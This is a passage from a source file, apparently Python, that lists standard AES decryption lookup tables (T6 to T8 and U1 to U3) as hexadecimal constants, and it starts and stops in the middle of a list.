0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742]
T6 = [0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857]
T7 = [0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8]
T8 = [0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0]
# Transformations for decryption key expansion
U1 = [0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3]
U2 = [0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697]
U3 = [0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 